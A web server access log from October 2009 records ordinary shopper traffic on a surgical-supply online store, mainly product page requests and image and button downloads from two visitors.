68.34.121.240 - - [22/Oct/2009:00:15:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C41899981001D19076+M37+ENG HTTP/1.1" 200 59117 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4C8479B1000179076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.50.54.167 - - [22/Oct/2009:00:15:18 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.34.121.240 - - [22/Oct/2009:00:15:19 -0400] "GET /images/fav_a-b.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C41899981001D19076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.50.54.167 - - [22/Oct/2009:00:15:20 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG HTTP/1.1" 200 64809 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:21 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:21 -0400] "GET /images/items/45418015_THUMB.JPG HTTP/1.1" 200 16032 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:21 -0400] "GET /images/items/45419001_THUMB.JPG HTTP/1.1" 200 14901 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:21 -0400] "GET /images/items/45415001_THUMB.JPG HTTP/1.1" 200 14884 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:21 -0400] "GET /images/items/45417901_THUMB.JPG HTTP/1.1" 200 14987 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:21 -0400] "GET /images/items/45415201_THUMB.JPG HTTP/1.1" 200 14626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:21 -0400] "GET /images/items/TRUSCREWS_THUMB.JPG HTTP/1.1" 200 15579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:21 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:21 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.34.121.240 - - [22/Oct/2009:00:15:21 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C448C2941002C69076+M37+ENG HTTP/1.1" 200 41656 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C41899981001D19076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C498459A1002819076+M37+ENG HTTP/1.1" 200 77717 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C448C2941002C69076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.50.54.167 - - [22/Oct/2009:00:15:38 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01579C4E8369F2001F3908I+WSEQ(S0060):1+OUITEM(A0200):45415001 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:38 -0400] "GET /images/items/45415001_FULL.JPG HTTP/1.1" 200 7917 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01579C4E8369F2001F3908I+WSEQ(S0060):1+OUITEM(A0200):45415001" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.34.121.240 - - [22/Oct/2009:00:15:43 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG HTTP/1.1" 200 76261 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C498459A1002819076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:45 -0400] "GET /images/next_white.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:45 -0400] "GET /images/items/SUTURE_SILK_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:45 -0400] "GET /images/items/SUTURE_CHROMIC_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:45 -0400] "GET /images/items/0038321BL_THUMB.JPG HTTP/1.1" 404 230 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:45 -0400] "GET /images/items/0037215_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:45 -0400] "GET /images/items/0100088_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:45 -0400] "GET /images/items/ALLOOSS1_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:45 -0400] "GET /images/items/0300073_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:49 -0400] "GET /images/next_white-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C4E8EB9C1003169076+M37+ENG HTTP/1.1" 200 71082 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4D824981002359076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:51 -0400] "GET /images/previous_white.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4E8EB9C1003169076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:51 -0400] "GET /images/items/0531030_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4E8EB9C1003169076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:51 -0400] "GET /images/items/1000203_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4E8EB9C1003169076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:51 -0400] "GET /images/items/1000204_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4E8EB9C1003169076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:51 -0400] "GET /images/items/1000205_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4E8EB9C1003169076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:51 -0400] "GET /images/items/1000206_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4E8EB9C1003169076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:55 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C4486D9F1004B69076+M37+ENG HTTP/1.1" 200 69944 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4E8EB9C1003169076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.50.54.167 - - [22/Oct/2009:00:15:55 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01579C4E8369F2001F3908I+WSEQ(S0060):1+OUITEM(A0200):45418015 HTTP/1.1" 200 27013 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.50.54.167 - - [22/Oct/2009:00:15:56 -0400] "GET /images/items/45418015_FULL.JPG HTTP/1.1" 200 16075 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L01579C4E8369F2001F3908I+WSEQ(S0060):1+OUITEM(A0200):45418015" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.34.121.240 - - [22/Oct/2009:00:15:56 -0400] "GET /images/items/3105206_THUMB.JPG HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4486D9F1004B69076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:15:56 -0400] "GET /images/items/4106032_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4486D9F1004B69076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:16:03 -0400] "GET /images/fav_a-b.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4486D9F1004B69076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:16:04 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C498FB921004239076+M37+ENG HTTP/1.1" 200 69945 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C4486D9F1004B69076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:16:06 -0400] "GET /images/items/4106032_THUMB.JPG HTTP/1.1" 404 228 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C498FB921004239076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.50.54.167 - - [22/Oct/2009:00:16:39 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01579C4E86E9920014A908I+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; en) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
68.34.121.240 - - [22/Oct/2009:00:17:07 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C498FB921004239076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:07 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:07 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:09 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:11 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C498FB921004239076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:11 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C498FB921004239076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:12 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG HTTP/1.1" 200 77724 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C498FB921004239076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.34.121.240 - - [22/Oct/2009:00:17:13 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L11379C418DB9C1005799076+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
